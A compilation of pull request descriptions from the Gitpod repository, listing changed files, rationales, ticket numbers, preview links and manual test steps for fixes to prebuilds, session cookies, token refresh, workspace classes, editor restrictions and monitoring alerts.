- components/dashboard/src/data/prebuilds/prebuild-logs-emitter.ts
- components/dashboard/src/prebuilds/detail/PrebuildDetailPage.tsx
- components/public-api/typescript-common/src/prebuild-utils.spec.ts
- components/public-api/typescript-common/src/prebuild-utils.ts
- components/server/src/prebuilds/prebuild-manager.ts
- components/server/src/util/request-context.ts
- components/server/src/workspace/headless-log-controller.ts
- components/server/src/workspace/workspace-service.ts
It will show streaming result with toast (auto close disabled) if server respond error
Fixes EXP-1360 EXP-1411
https://hw-debug-prebuild.preview.gitpod-dev.com/workspaces
1️⃣ Prebuild log works:
- Access preview env, trigger a prebuild
- Access prebuild-logs entry (can be find in DevTool of prebuild log view), it should work like before and Browser tab indicator should stop show loading circle after everything is done
- It should throw and print error on server when
2️⃣ Permission check:
- Should not able to access https://hw-debug-prebuild.preview.gitpod-dev.com/prebuild-logs/d5780885-fbe2-47fb-b748-3d83d4951e24 (it will print X-Prebuild-Error:xxx)
- Join org via https://hw-debug-prebuild.preview.gitpod-dev.com/orgs/join?inviteId=29067092-cd09-4ee0-ba68-5da1e838d9d2, link above should …
> [server, dashboard] improve single prebuild view

- components/public-api-server/pkg/auth/middleware.go
- components/server/src/session-handler.spec.db.ts
- components/server/src/session-handler.ts
Previously, we would pick the last cookie (with the same name) the browser sends us, which is "random": browser-dependent, and complex/different for every call.
This makes us pick the first valid JWT cookie from the list of correctly named cookies.
Fixes EXP-1415
- [tests](https://github.com/gitpod-io/gitpod/blob/32fa7aa4ca80e68291112a4c0a9a1e7f41504a5d/components/server/src/session-handler.spec.db.ts#L107-L146) are :green_circle: 
- go to https://gpl-ood-cookie.preview.gitpod-dev.com/workspaces
- sign up
- go to "Storage/Cookies", and add another cookie:
- with some random value
- domain should be automatically be set to "gpl-ood-cookie.preview.gitpod-dev.com" (without the dot)
- name: "_gpl_ood_cookie_preview_gitpod_dev_com_jwt2_"
-  navigate around (especially …
> [server] Fix handling of multiple session cookies with the same name

- components/server/src/user/token-service.ts
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [auth] Attempt to refresh token 3 times EXP-1413

- components/common-go/experiments/flags.go
- components/public-api-server/pkg/apiv1/identityprovider.go
- components/public-api-server/pkg/apiv1/identityprovider_test.go
- components/public-api-server/pkg/server/server.go
Fixes EXP-1389
https://hw-exp-1389.preview.gitpod-dev.com/workspaces
1️⃣  user_id should be in token you generate
- Exec `gp idp token --audience hello` in preview env workspace
- Decode in jwt.io, there should have a `user_id` field
2️⃣ customize subject
- Update FF https://app.configcat.com/08da1258-64fb-4a8e-8a1e-51de773884f6/08da1258-6541-4fc7-8b61-c8b47f82f3a0/08da1258-6512-4ec0-80a3-3f6aa301f853?settingId=290994 with your team to proper value
- Check with `gp idp token --audience hello`
- Decode in jwt.io and you should see subject field `sub` changed according to your setting
gitpod:summary
<details>
</details>
<details>
</details>
<details> …
> [IdP] add `user_id` claim and allow to customize OIDC subject via FF

- components/dashboard/src/repositories/detail/variables/ConfigurationAddVariableModal.tsx
- components/dashboard/src/repositories/detail/variables/ConfigurationModifyVariableModal.tsx
- components/dashboard/src/repositories/detail/variables/ConfigurationVariableItem.tsx
- components/dashboard/src/repositories/detail/variables/ConfigurationVariableList.tsx
Removed the ability to edit repository-level environment variables, since the omission of the previous value was causing confusion.
Fixes EXP-1397
1. Create a repo configuration
2. Add an environment variable
3. `¯\_(ツ)_/¯`
<ul>
<li><b>🏷️ Name</b> - ft-disablefa53d263a6</li>
<li><b>🔗 URL</b> - <a href="https://ft-disablefa53d263a6.preview.gitpod-dev.com/workspaces" target="_blank">ft-disablefa53d263a6.preview.gitpod-dev.com/workspaces</a>.</li> …
>  Remove ability to edit repository variables

- components/dashboard/src/app/AppRoutes.tsx
Fixes EXP-1418
https://hw-exp-1418.preview.gitpod-dev.com/workspaces
Related pages are still working
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [dashboard] add route without FF checking

- components/ide/jetbrains/gateway-plugin/src/main/resources/META-INF/plugin.xml
show GitPod Plugin In IDEA
IDEA's remote development have released . the interface in IDEA will be more and more important .
Fixes #
https://github.com/gitpod-io/gitpod/issues/19296
install the plugin in IDEA 
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [JetBrains] make plugin support other platforms

- components/dashboard/src/components/podkit/buttons/LinkButton.tsx
- components/dashboard/src/workspaces/CreateWorkspacePage.tsx
Fixes EXP-1433
https://hw-exp-1433.preview.gitpod-dev.com/workspaces
Test with via https://github.com/gitpod-io/dashboard-playwright-tests/blob/main/tests/workspace.spec.ts, or test manually:
- Start workspace with custom options
- Goes to workspace start page with the same context
- It should show previous options you started
- Add search params to URL with `editor`, `workspaceClass`
- It should show correct options in UX
- Try add `autostart` options, priorities should be the same
gitpod:summary
<details>
</details>
<details>
</details>
<details> …
> [dashboard] fix workspace start options ordering

- components/proxy/conf/Caddyfile
- components/server/src/prometheus-metrics.ts
- components/server/src/workspace/workspace-starter.ts
- operations/observability/mixins/meta/rules/server.yaml
to prevent false alerts (EXP-1434)
We some cases where we got paged last week for this very error. This PR labels and filters them out.
Fixes EXP-1434
- start a workspace on a repo on gitlab.com
- create a snapshot
- login with another user that is _not_ linked to GitLab
- try to open the workspace: it fails :heavy_check_mark: 
- do:
- `kubectl port-forward deployment/server 9500 &`
- `curl server:9500/metrics | grep gitpod_server_instance_starts_failed_total` and see that:
- `reason: "scmAccessFailed"` +1
- `reason: "other"` = 0
gitpod:summary
<details>
</details>
<details>
</details>
<details>
Add desired feature flags to the end of the …
> [server] Missing SCM access: Filter out user error on workspace start

- components/proxy/conf/Caddyfile
- components/server/src/user/token-service.ts
Attempt two to fix token refresh (attempt one is [here](https://github.com/gitpod-io/gitpod/pull/19452)) using a redis mutex.
Code is guarded with the `sync_refresh_token_exchange` feature flag.
Fixes EXP-1413
- start a workspace on a repo on gitlab.com :heavy_check_mark: 
- extended test:
- invalidate your GitLab token (by changing the expiryDate in the DB)
- start another workspace on GitLab
- see how the token got refreshed :heavy_check_mark: 
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
<summary>Preview Environment / …
> [server] Sync token refresh

- components/dashboard/src/prebuilds/detail/PrebuildDetailPage.tsx
Fixes an itty bitty regression I created in https://github.com/gitpod-io/gitpod/pull/19460, where rerunning a prebuild would not get rid of the log not found overlay.
Start a prebuild which should fail and rerun it. The no logs screen should reset with the rerun.
<ul>
<li><b>🏷️ Name</b> - ft-fix-rere75871d56c</li>
<li><b>🔗 URL</b> - <a href="https://ft-fix-rere75871d56c.preview.gitpod-dev.com/workspaces" target="_blank">ft-fix-rere75871d56c.preview.gitpod-dev.com/workspaces</a>.</li> …
> Fix failed prebuild reruns

- components/gitpod-protocol/src/gitpod-service.ts
server will call this method too https://github.com/gitpod-io/gitpod/blob/5a7403e6bbefc94a30a358b3980cc817b1e3614e/components/server/src/workspace/workspace-starter.ts#L1556
Fixes EXP-1451
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Fix duration validation

- components/server/src/prometheus-metrics.ts
- components/server/src/user/token-service.ts
This PR improves two things around token refresh:
1. [[server] Check token even in case of timeout](https://github.com/gitpod-io/gitpod/commit/c253faf6c74c26e133a2628bb6828b8a9ffdc273)
- in prod we observed suspiciously high latencies on `Authprovider.refreshToken` (10s+) even though in some cases (we inspected) the token seemed to already be present in our database (?). This case should improve those cases. 
1. https://github.com/gitpod-io/gitpod/commit/4149ccd3e3a49867f224620921f4810c02d6761e
- these metrics should help better discern the cases we observed
Fixes EXP-1413
- sign in https://gpl-1413-improve.preview.gitpod-dev.com/workspaces
- Create a workspace from a repo on gitlab.com , e.g. https://gpl-1413-improve.preview.gitpod-dev.com/#https://gitlab.com/geropl/gitpod-test …
> [server] Improve behavior and reporting around "refreshToken"

- components/public-api-server/pkg/apiv1/project.go
- components/public-api-server/pkg/apiv1/project_test.go
- components/public-api/typescript-common/fixtures/fromPartialConfiguration_1.golden
- components/public-api/typescript-common/fixtures/fromPartialConfiguration_3.golden
- components/public-api/typescript-common/fixtures/fromPartialConfiguration_3.json
- components/public-api/typescript-common/fixtures/toConfiguration_2.golden
- components/public-api/typescript-common/fixtures/toConfiguration_2.json
- components/public-api/typescript-common/fixtures/toWorkspaceSettings_1.golden
- components/public-api/typescript-common/fixtures/toWorkspaceSettings_1.json
- components/public-api/typescript-common/fixtures/toWorkspaceSettings_3.golden
- components/public-api/typescript-common/fixtures/toWorkspaceSettings_3.json
- components/public-api/typescript-common/src/public-api-converter.ts
- components/server/src/api/configuration-service-api.ts
- components/server/src/orgs/organization-service.ts
- components/server/src/projects/projects-service.ts
- components/server/src/workspace/workspace-service.ts
- Part of https://github.com/gitpod-io/gitpod/pull/19410
- Blocked by https://github.com/gitpod-io/gitpod/pull/19480
- Need to be rebased after blocked PR merged
Fixes #
Should be tested in https://github.com/gitpod-io/gitpod/pull/19410
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [papi,server] implement `restricted_workspace_classes` in server

- components/gitpod-db/src/typeorm/migration/1709205581055-AddOrgSettingsRestrictedEditors.ts
Fixes EXP-1482
Once preview is ready
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Add db migration for org-level editor restriction

- components/dashboard/src/components/Modal.tsx
- components/dashboard/src/components/SelectWorkspaceClassComponent.tsx
- components/dashboard/src/components/WorkspaceClassesOptions.tsx
- components/dashboard/src/components/podkit/switch/Switch.tsx
- components/dashboard/src/components/podkit/typography/Headings.tsx
- components/dashboard/src/data/featureflag-query.ts
- components/dashboard/src/data/workspaces/workspace-classes-query.test.ts
- components/dashboard/src/data/workspaces/workspace-classes-query.ts
- components/dashboard/src/repositories/detail/ConfigurationDetailPage.tsx
- components/dashboard/src/repositories/detail/ConfigurationDetailWorkspaces.tsx
- components/dashboard/src/repositories/detail/workspaces/ConfigurationWorkspaceClassesOptions.tsx
- components/dashboard/src/repositories/repositories.routes.ts
- components/dashboard/src/workspaces/CreateWorkspacePage.tsx
- Blocked by https://github.com/gitpod-io/gitpod/pull/19480
- Blocked by https://github.com/gitpod-io/gitpod/pull/19481
- Need to be rebased after blocked PRs merged
Related [project](https://linear.app/gitpod/project/gitpod-now-restrict-workspace-classes-5514537102b4)
https://exp-project-ws-cls.preview.gitpod-dev.com/workspaces
- Import a configuration, update its workspace classes setting
- Update organization workspace classes settings
0️⃣ both restricted ws class and default ws class needs to be tested
1️⃣ org-level settings should affect config-level settings
2️⃣ both org and config level settings should affect create workspace page
3️⃣ (nit as old project view may be deleted) old project settings page, default workspace classes should work as before
<p>Gitpod was successfully …
> [dashboard] restrict workspace classes on repo-level

- components/dashboard/src/components/SelectWorkspaceClassComponent.tsx
- components/dashboard/src/components/WorkspaceClassesOptions.tsx
- components/dashboard/src/data/workspaces/workspace-classes-query.ts
- components/dashboard/src/repositories/detail/workspaces/ConfigurationWorkspaceClassesOptions.tsx
Fixes #
- https://hw-cls-fix.preview.gitpod-dev.com/new is accessible
- Use Browser Extension to create ws in preview env should not show `no allowed workspace classes...` under class selector
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Fix new workspace page re-render loop and false negative error message for ws class

- components/scrubber/config.go
- components/scrubber/sanitisation.go
- components/scrubber/sanitisation_test.go
- components/scrubber/scrubber.go
- components/scrubber/scrubber_test.go
This change hashes the URL path parts separately instead of the whole context URL. Is does not hash specific keywords (as “pull”, “tree”) and does not hash URL path parts that consist of numbers only.
Example:
```
https://github.com/gitpod-io/gitpod/pull/19402
```
becomes:
```
[redacted:md5:3097fca9b1ec8942c4305e550ef1b50a]/[redacted:md5:d41d8cd98f00b204e9800998ecf8427e]/[redacted:md5:308cb0f82b8a4966a32f7c360315c160]/[redacted:md5:5bc8d0354fba47db774b70d2a9161bbb]/pull/19402
```
Fixes https://linear.app/gitpod/issue/ENG-363/only-scrub-parts-of-a-string-for-context-url-in-analytics-events
Use the go test files to test it.
gitpod:summary
<details>
</details>
<details> …
> [scrubber] Scrub URL path parts separately

- operations/observability/mixins/workspace/rules/central/image-builder.yaml
- operations/observability/mixins/workspace/rules/central/node-labeler.yaml
- operations/observability/mixins/workspace/rules/central/ws-manager.yaml
- operations/observability/mixins/workspace/rules/central/ws-proxy.yaml
The proper label to use with `kube_deployment_spec_replicas` is deployment.
`container` is okay with `kube_pod_container_status_restarts_total`
Fixes ENG-1804
[Here](https://gitpoddedicatedprod.grafana.net/explore?schemaVersion=1&panes=%7B%224kl%22:%7B%22datasource%22:%22grafanacloud-prom%22,%22queries%22:%5B%7B%22refId%22:%22B%22,%22expr%22:%22kube_deployment_spec_replicas%7Bdeployment%3D%5C%22ws-manager-mk2%5C%22,%20cluster%21~%5C%22ephemeral.%2A%5C%22%7D%20%21%3D%20kube_deployment_status_replicas_available%7Bdeployment%3D%5C%22ws-manager-mk2%5C%22,%20cluster%21~%5C%22ephemeral.%2A%5C%22%7D%22,%22range%22:true,%22instant%22:true,%22datasource%22:%7B%22type%22:%22prometheus%22,%22uid%22:%22grafanacloud-prom%22%7D,%22editorMode%22:%22code%22,%22legendFormat%22:%22__auto%22,%22hide%22:false …
> [obs] fix alerts for workspace deployments

- install/installer/cmd/mirror_list.go
[installer] fix mirror list get empty image
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [installer] fix mirror list get empty image

- components/common-go/kubernetes/kubernetes.go
- components/service-waiter/cmd/component.go
- dev/image/Dockerfile
- install/installer/pkg/common/constants.go
- install/installer/pkg/components/public-api-server/deployment.go
- install/installer/pkg/components/server/deployment.go
[service-waiter] add addition image condition in annotation
Fixes ENG-1817
1. use `kubectl` to check `server` and `public-api-server` pods, the pod's annotation `gitpod.io/image_name` should be the same as pod image
2. change `server` image in deployment, then restart the `dashboard`, it should be fine
<ul>
<li><b>🏷️ Name</b> - pd-api-for-commit</li>
<li><b>🔗 URL</b> - <a href="https://pd-api-for-commit.preview.gitpod-dev.com/workspaces" target="_blank">pd-api-for-commit.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce80ab31a41e29eff2735e38eec39" target="_blank">internal documentation</a> for information on how to …
> [service-waiter] add addition image condition in annotation

- components/dashboard/src/prebuilds/detail/PrebuildDetailPage.tsx
When there is no prebuild yet, do not assume the status is not available. Instead, wait for a prebuild to load first.
Fixes EXP-1427
Go to a prebuild's page and observe the phase's first state is the correct one and not unknown.
<ul>
<li><b>🏷️ Name</b> - ft-exp-1427</li>
<li><b>🔗 URL</b> - <a href="https://ft-exp-1427.preview.gitpod-dev.com/workspaces" target="_blank">ft-exp-1427.preview.gitpod-dev.com/workspaces</a>.</li> …
> Do not flash unknown prebuild status

- components/server/src/user/token-service.ts
Dead code/feature flag cleanup.
Fixes EXP-1505
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [server] Remove feature flags and cleanup dead code in TokenService

- components/gitpod-db/src/typeorm/migration/1709709649212-AddOrgSettingsDefaultEditor.ts
Relates EXP-1259 project
Once preview is accessible https://hw-org-db-migration.preview.gitpod-dev.com/workspaces
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Add db migration for org-level default editor

- components/dashboard/src/components/InputWithCopy.tsx
- components/dashboard/src/prebuilds/list/RunPrebuildModal.tsx
- components/server/src/api/prebuild-service-api.ts
- components/server/src/prebuilds/prebuild-manager.ts
Allows you to create prebuilds from any branch your heart desires.
Fixes EXP-1491
https://ft-manual-f41a539ce1.preview.gitpod-dev.com/prebuilds
1. Import a repo and turn prebuilds on
2. Run a prebuild manually
<ul>
<li><b>🏷️ Name</b> - ft-manual-f41a539ce1</li>
<li><b>🔗 URL</b> - <a href="https://ft-manual-f41a539ce1.preview.gitpod-dev.com/workspaces" target="_blank">ft-manual-f41a539ce1.preview.gitpod-dev.com/workspaces</a>.</li> …
> Allow running prebuilds on a specific branch

- install/installer/pkg/components/server/configmap.go
The job takes less than 30 minutes in prod, so we can run it more frequently.
See https://linear.app/gitpod/issue/EXP-1526/enable-content-deletion#comment-90051dd5
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Increase frequency of the gc job

- components/gitpod-db/src/typeorm/entity/db-team-settings.ts
- components/gitpod-db/src/typeorm/migration/1709626232691-AddPinnedEditorVersions.ts
- components/gitpod-db/src/typeorm/team-db-impl.ts
- components/gitpod-protocol/src/teams-projects-protocol.ts
Add pinnedEditorVersions db migration
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Add pinnedEditorVersions db migration

- components/dashboard/src/workspaces/CreateWorkspacePage.tsx
Previously, when creating a workspace from a context URL of an unauthorized provider and clicking `Authorize` from the error alert, one would have to refresh to allow themselves to proceed with workspace creation. This change refetches the provider state when you complete the authentication.
Fixes EXP-1516
As instructed in EXP-1516:
> go to user setings and make sure no gitlab.com git provider is enabled (remove if you have it)
open [contextLink](https://gitlab.com/jeanphi-baconnais-experiments/gitpod-terminal/-/tree/main?ref_type=heads)
click "Authorize with Gitlab.com"  and proceed.
<ul>
<li><b>🏷️ Name</b> - ft-exp-1516</li>
<li><b>🔗 URL</b> - <a href="https://ft-exp-1516.preview.gitpod-dev.com/workspaces" …
> Fix freshly authed SCMs on the new workspace page

- operations/observability/mixins/workspace/rules/central/nodes.yaml
Alert for high load average on headless nodes. [Context](https://gitpod.slack.com/archives/C06NF8LBSRY)
Fixes ENG-1864
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Alert for high load average on headless nodes

- operations/observability/mixins/cross-teams/dashboards/gitpod-overview.json
[Context](https://gitpod.slack.com/archives/C06NF8LBSRY)
Fixes ENG-1873
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Add panel for headless nodes

- operations/observability/mixins/meta/rules/server.yaml
reduce likelihood of false posistive alert
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [server] reduce false positive alerting

- operations/observability/mixins/workspace/rules/satellite/workspaces.yaml
cc: @svenefftinge for 👀 
Fixes n/a
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> [obs] temporarily reduce alert frequency

- components/dashboard/src/components/AuthorizeGit.tsx
- components/dashboard/src/workspaces/CreateWorkspacePage.tsx
Following on an edge case I did not cover in https://github.com/gitpod-io/gitpod/pull/19517, this PR makes sure to refetch the workspace context after one authorizes their git integration via the dedicated view instead of the banner.
<ul>
<li><b>🏷️ Name</b> - ft-refetchd7ab1f88ad</li>
<li><b>🔗 URL</b> - <a href="https://ft-refetchd7ab1f88ad.preview.gitpod-dev.com/workspaces" target="_blank">ft-refetchd7ab1f88ad.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 …
> Make sure to refetch ws ctx after `AuthorizeGit`

- components/dashboard/src/Login.tsx
- components/dashboard/src/app/AppRoutes.tsx
- components/dashboard/src/start/StartPage.tsx
- components/dashboard/src/workspaces/CreateWorkspacePage.tsx
Show the loading screen when autostart=true
Fixes #EXP-1344
Fixes #EXP-1569
Try this: https://se-auto-start.preview.gitpod-dev.com/new/?autostart=true#https://github.com/svenefftinge/2048-in-terminal
Unhappy path: https://se-auto-start.preview.gitpod-dev.com/new?autostart=true#https://github.com/svenefftinge/2048-in-terssminal
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [dashboard] update login screen and autostart

- components/public-api/typescript-common/src/public-api-converter.ts
follow-up of incident
Fixes EXP-1448
Once build pass
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> Fix papi failed to convert with `wsi.conditions` undefined

- components/ws-manager-mk2/controllers/status.go
- components/ws-manager-mk2/controllers/workspace_controller.go
- components/ws-manager-mk2/service/manager.go
Add tracing to the workspace reconciler, and additional tracing to the API service, especially around k8s operations.
Gives us better visibility into how much time is spent on what during reconciliations and API handlers.
https://gitpod.slack.com/archives/C06PTBSE59N/p1710269657251179
I've tested in a preview env that workspaces still start and stop. But haven't been able to verify the tracing works, there's no tracing configured in preview envs as far as I know. Changes should be low risk though?
<ul>
<li><b>🏷️ Name</b> - wv-add-mk261c2ed1f6b</li>
<li><b>🔗 URL</b> - <a href="https://wv-add-mk261c2ed1f6b.preview.gitpod-dev.com/workspaces" target="_blank">wv-add-mk261c2ed1f6b.preview.gitpod-dev.com/workspaces</a>.</li> …
> [ws-manager-mk2] Add workspace reconciler tracing

- WORKSPACE.yaml
- install/installer/pkg/components/ide-service/ide_config_configmap.go
- install/installer/pkg/components/workspace/ide/constants.go
Update code 1.87.1
<ul>
<li><b>🏷️ Name</b> - jp-only-wildfowl</li>
<li><b>🔗 URL</b> - <a href="https://jp-only-wildfowl.preview.gitpod-dev.com/workspaces" target="_blank">jp-only-wildfowl.preview.gitpod-dev.com/workspaces</a>.</li> …
> [code] Update code 1.87.1

- components/dashboard/src/prebuilds/detail/PrebuildDetailPage.tsx
- components/gitpod-db/src/typeorm/workspace-db-impl.spec.db.ts
- components/gitpod-db/src/typeorm/workspace-db-impl.ts
This is an effort to clean up orphaned prebuilds from the prebuilds page. It ensures we do not return any prebuilds of deleted projects and therefore also not showing them in the UI.
Fixes EXP-1377
1. [Join my org](https://ft-hide-orbc251e49cc.preview.gitpod-dev.com/orgs/join?inviteId=e4b0fa57-9ecb-4342-9cac-d3e63ba37d11)
2. Go to /prebuilds on the preview env
3. Try to find [this prebuild,](https://ft-hide-orbc251e49cc.preview.gitpod-dev.com/prebuilds/5088f4c1-4936-4a2d-81d7-cb7e1f680f8b) you should not be able to.
<ul>
<li><b>🏷️ Name</b> - ft-hide-orbc251e49cc</li>
<li><b>🔗 URL</b> - <a href="https://ft-hide-orbc251e49cc.preview.gitpod-dev.com/workspaces" target="_blank">ft-hide-orbc251e49cc.preview.gitpod-dev.com/works …
> Ensure valid repository tie when listing prebuilds

- components/dashboard/src/components/typography/headings.tsx
Segoe UI fonts on Windows act funny and require bigger line heights than their SF UI counterparts on macOS. This is a hotfix to a problem we should solve with a consistent, unified typeface.
| ![image](https://github.com/gitpod-io/gitpod/assets/29888641/2057037c-8b73-4e78-bb73-3823169f9335) | ![image](https://github.com/gitpod-io/gitpod/assets/29888641/a0e4423d-96ad-425f-8d4d-81c2964f6b9b) | 
Fixes EXP-1632
1. Use Windows
2. Go to the login screen and see no clips
<ul>
<li><b>🏷️ Name</b> - ft-fix-line-heights</li>
<li><b>🔗 URL</b> - <a href="https://ft-fix-line-heights.preview.gitpod-dev.com/workspaces" target="_blank">ft-fix-line-heights.preview.gitpod-dev.com/workspaces</a>.</li> …
> Fix line heights for `<h1>`s

- components/dashboard/src/components/typography/headings.tsx
Correctly apply changes in https://github.com/gitpod-io/gitpod/pull/19559.
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Fix line heights for `<h1>`s (#19559)

- operations/observability/mixins/meta/rules/dashboard.yaml
Fixes [[internal chat](https://gitpod.slack.com/archives/C01TNS8EVQT/p1711024656288929?thread_ts=1710987022.919879&cid=C01TNS8EVQT)]
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> [observability] increase dashboard pods readiness check duration

- components/dashboard/src/components/IdeOptions.tsx
- components/dashboard/src/components/SelectIDEComponent.tsx
- components/dashboard/src/data/ide-options/ide-options-query.ts
- components/dashboard/src/repositories/detail/ConfigurationDetailEditors.tsx
- components/dashboard/src/repositories/detail/ConfigurationDetailPage.tsx
- components/dashboard/src/repositories/detail/editors/ConfigurationWorkspaceEditorsOptions.tsx
- components/dashboard/src/repositories/repositories.routes.ts
- components/dashboard/src/teams/TeamSettings.tsx
- components/dashboard/src/workspaces/CreateWorkspacePage.tsx
- components/gitpod-protocol/src/teams-projects-protocol.ts
- components/public-api/typescript-common/src/public-api-converter.ts
- components/server/src/api/configuration-service-api.ts
- components/server/src/projects/projects-service.ts
Fixes EXP-1484, EXP-1262, EXP-1264
- Try to update both repo and org-level available editors
- Test on create workspace page if the option and error message is expected
Examples to load create workspace pages:
- Change contextUrl on browser manually
- Add search param `editor` on url manually
- Update selected repo
- Update selected editor then update selected repo
- ...
<ul>
<li><b>🏷️ Name</b> - hw-repo-editor</li>
<li><b>🔗 URL</b> - <a href="https://hw-repo-editor.preview.gitpod-dev.com/workspaces" target="_blank">hw-repo-editor.preview.gitpod-dev.com/workspaces</a>.</li> …
> Add repo-level editor restriction

- components/dashboard/src/components/WorkspaceLogs.tsx
- components/dashboard/src/prebuilds/detail/PrebuildDetailPage.tsx
Make sure that the prebuild statuses we show on the list page reflect those which we show on the detail page.
Fixes EXP-1643
<ul>
<li><b>🏷️ Name</b> - ft-unify-p53a20bcd2b</li>
<li><b>🔗 URL</b> - <a href="https://ft-unify-p53a20bcd2b.preview.gitpod-dev.com/workspaces" target="_blank">ft-unify-p53a20bcd2b.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - ft-unify-prebuild-statuses-gha.23820</li> …
> Unify prebuild status indicators

- components/dashboard/src/components/IdeOptions.tsx
- components/dashboard/src/components/SelectIDEComponent.tsx
- components/dashboard/src/teams/TeamSettings.tsx
- Add message to show that only owner can update org settings
- Better error messages when user select an unsupported editor (via url search param `editor`)
- Fix repo-level editor restriction allows to block all editors bug
‼️ not sure about first point, as all settings on org-level only allow `owner` to update it
Fixes EXP-1671, EXP-1672, EXP-1674
https://hw-restric6410a20100.preview.gitpod-dev.com/workspaces
Check points on PR description
Join an org as a member https://hw-restric6410a20100.preview.gitpod-dev.com/orgs/join?inviteId=46fa8597-ed0a-4997-8260-068c736121b9
gitpod:summary
<details>
</details>
<details>
</details>
<details>
Add …
> Improve dashboard editor restriction settings

- components/gitpod-db/go/cost_center.go
- components/registry-facade/pkg/registry/registry.go
- components/ws-daemon/pkg/internal/session/workspace.go
- components/ws-manager-mk2/service/manager.go
- dev/preview/ssh-vm.sh
- test/tests/components/ws-manager/prebuild_test.go
remove repetitive words 
Fixes #
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details>
</details>
/hold
> remove repetitive words

- .github/actions/delete-preview/Dockerfile
- .github/actions/deploy-gitpod/Dockerfile
- .github/actions/deploy-monitoring-satellite/Dockerfile
- .github/actions/preview-create/Dockerfile
- .github/workflows/build.yml
- .github/workflows/code-nightly.yml
- .github/workflows/ide-integration-tests.yml
- .github/workflows/lacework-inline-scanner.yml
- .github/workflows/preview-env-check-regressions.yml
- .github/workflows/preview-env-gc.yml
- .github/workflows/workspace-integration-tests.yml
- .gitpod.yml
- components/public-api/typescript-common/fixtures/toWorkspace2_2.json
- components/supervisor/openssh/BUILD.yaml
- components/supervisor/openssh/leeway.Dockerfile
- dev/image/Dockerfile
Update go to v1.22.1.
As a side effect of the update of the image, docker now generates an OCI image, requiring an update to extract content from the ssh container image.
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Rebuild dev-image for go v1.22

- .github/workflows/jetbrains-auto-update-template.yml
- .github/workflows/jetbrains-auto-update.yml
May need to update https://github.com/gitpod-io/gitpod/pull/19572
Fixes #
See https://github.com/gitpod-io/gitpod/actions/runs/8416187349
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Use custom runner for JetBrains auto update GHA

- components/gitpod-protocol/src/protocol.ts
- components/server/src/user/env-var-service.ts
Fixes #19574
https://hw-fix-env.preview.gitpod-dev.com/workspaces
- It can't create env var (on user settings or repo settings) with prefixed naming `GITPOD_`
- Except `GITPOD_IMAGE_AUTH` as it's documented [here](https://www.gitpod.io/docs/configure/workspaces/workspace-image#use-a-private-docker-image)
- Search document repo if there's another other prefixed `GITPOD_` env is documented (I did it, seems only this one)
<ul>
<li><b>🏷️ Name</b> - hw-fix-env</li>
<li><b>🔗 URL</b> - <a href="https://hw-fix-env.preview.gitpod-dev.com/workspaces" target="_blank">hw-fix-env.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📚 Documentation</b> - See our <a href="https://www.notion.so/gitpod/6debd359591b43688b52f76329d04010#7c1ce …
> White list `GITPOD_IMAGE_AUTH` env var name

- components/ws-daemon/debug.Dockerfile
- components/ws-daemon/leeway.Dockerfile
<ul>
<li><b>🏷️ Name</b> - aledbf-update-gcloud</li>
<li><b>🔗 URL</b> - <a href="https://aledbf-update-gcloud.preview.gitpod-dev.com/workspaces" target="_blank">aledbf-update-gcloud.preview.gitpod-dev.com/workspaces</a>.</li>
<li><b>📦 Version</b> - aledbf-update-gcloud-gha.23976</li>
<li><b>🗒️ Logs</b> - <a href="https://console.cloud.google.com/logs/query;query=jsonPayload.kubernetes.host%3D%22preview-aledbf-update-gcloud%22%0A%0A--%20Filter%20on%20service:%0A--%20jsonPa …
> Update ws-daemon gcloud dependency and runc

- .github/workflows/jetbrains-auto-update-template.yml
Fixes [[internal chat](https://gitpod.slack.com/archives/C02F9LQU4DR/p1711537504458479)]
gitpod:summary
<details>
</details>
<details>
</details>
<details>
</details>
<details> …
> Align base image of GHA

- components/dashboard/src/workspaces/CreateWorkspacePage.tsx
Sometimes, if you had a preferred workspace class saved, this preference wouldn't be applied when creating a new workspace. Instead, the system would revert to the default setting. The root cause of this issue was that the code didn't properly wait for the query fetching the allowed workspace classes to finish. As a result, when it tried to verify if your saved preference was permitted according to the allowlist, it found the list to be empty, leading to the default setting being applied.
Fixes EXP-1502
1. Start a workspace with context URL A on a non-default workspace class
2. Block `/public-api/gitpod.v1.OrganizationService/GetOrganizationSettings` and `/public-api/gitpod.v1.WorkspaceService/ListWorkspaceClasses`
